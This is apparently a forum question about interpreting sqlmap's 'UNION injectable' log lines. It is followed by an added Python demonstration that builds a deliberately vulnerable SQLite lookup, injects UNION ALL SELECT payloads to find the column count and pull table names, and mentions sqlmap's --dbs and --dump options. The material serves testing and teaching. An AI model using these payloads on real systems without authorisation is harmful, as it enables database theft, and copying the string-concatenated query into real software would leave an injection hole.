I am using sqlmap to look for SQL-injection threats in our application.
http://myurl.net/question/teaching/answer/sujan-justice?as=Course
and I tried to run the following:
sqlmap.py -u "http://myurl.net/question/teaching/answer/sujan-justice?as=Course" --dbms=mysql --level=5
Here is the console:
[11:35:46] [INFO] testing connection to the target URL
[11:35:46] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:35:47] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] r
please enter value for parameter 'regex': *
[11:35:59] [INFO] testing if GET parameter 'as' is dynamic
[11:35:59] [WARNING] GET parameter 'as' does not appear dynamic
[11:35:59] [WARNING] heuristic (basic) test shows that GET parameter 'as' might not be injectable
[11:35:59] [INFO] testing for SQL injection on GET parameter 'as'
[11:36:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:36:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:39:25] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:39:25] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:39:25] [INFO] testing 'MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses'
[11:39:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:40:17] [INFO] target URL appears to be UNION injectable with 1 columns
[11:40:55] [INFO] target URL appears to be UNION injectable with 5 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[11:41:15] [INFO] target URL appears to be UNION injectable with 2 columns
[11:41:36] [INFO] testing 'MySQL UNION query (71) - 11 to 20 columns'
[11:41:38] [INFO] target URL appears to be UNION injectable with 17 columns
[11:41:48] [INFO] target URL appears to be UNION injectable with 15 columns
Can someone help me understand what this line means:
[11:40:17] [INFO] target URL appears to be UNION injectable with 1 columns
I'm not sure, but I assume it means that an SQL attack can be carried out against the application. If that's right, then can you help me with how I should do it?
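Added example, not part of the original question and not sqlmap's own code: a Python script against a constructed in-memory SQLite table that reproduces what sqlmap is doing when it prints "target URL appears to be UNION injectable with N columns". It appends `' UNION ALL SELECT NULL,NULL,...-- ` to the parameter with 1, 2, ... columns and records which counts the database accepts without an error. A UNION has to match the column count of the original SELECT, so a genuine finding yields exactly one count (4 for the assumed query below). The table, its columns and the `vulnerable_lookup` function are assumptions standing in for the application's real MySQL query; `extract_table_names` shows the follow-up step that sqlmap automates once the count is known (on MySQL it would read `information_schema.tables` rather than `sqlite_master`).

```python
import sqlite3


def build_db():
    """Constructed in-memory database standing in for the app's MySQL backend (assumption)."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE answers (id INTEGER, slug TEXT, course TEXT, body TEXT)")
    cur.executemany(
        "INSERT INTO answers VALUES (?, ?, ?, ?)",
        [
            (1, "sujan-justice", "Course", "answer body one"),
            (2, "other-slug", "Course", "answer body two"),
        ],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, param):
    """Deliberately vulnerable stand-in for the page handler: the 'as' value is
    concatenated straight into the SQL text, which is what makes UNION injection possible."""
    query = f"SELECT id, slug, course, body FROM answers WHERE course = '{param}'"
    return conn.execute(query).fetchall()


def find_union_columns(conn, max_cols=10, union_char="NULL"):
    """Probe 1..max_cols columns the way sqlmap's 'UNION query (NULL) - 1 to 10 columns'
    test does. union_char="NULL" is the default; a digit mirrors sqlmap's --union-char
    fallback for queries that reject NULL. Returns every column count the DB accepts."""
    working = []
    for n in range(1, max_cols + 1):
        cols = ",".join([union_char] * n)
        payload = f"Course' UNION ALL SELECT {cols}-- "
        try:
            vulnerable_lookup(conn, payload)
            working.append(n)
        except sqlite3.OperationalError:
            # Column-count mismatch: the DB refuses the UNION, so this count is wrong.
            pass
    return working


def extract_table_names(conn, ncols):
    """Once the column count is known, put a data-returning SELECT in the UNION.
    Here the second column carries sqlite_master.name; the other columns are NULL padding."""
    cols = ["NULL"] * ncols
    cols[1] = "name"
    payload = (
        f"Course' UNION ALL SELECT {','.join(cols)} FROM sqlite_master "
        "WHERE type='table'-- "
    )
    rows = vulnerable_lookup(conn, payload)
    # Rows produced by our UNION have NULL in the first column; the app's own rows have an id.
    return sorted({row[1] for row in rows if row[0] is None})


if __name__ == "__main__":
    db = build_db()
    print("column counts accepted:", find_union_columns(db))        # [4]
    print("tables via UNION:", extract_table_names(db, 4))          # ['answers']
```

Against a real target the same probe succeeds for exactly one count. When sqlmap reports several different counts for one parameter, as in the log above, its page comparison is not telling a successful UNION apart from an error response; giving it `--string` or `--regexp` with text that appears only in a correct page, or pinning the count with `--union-cols`, gives it a reliable signal before you move on to `--dbs` or `--dump`.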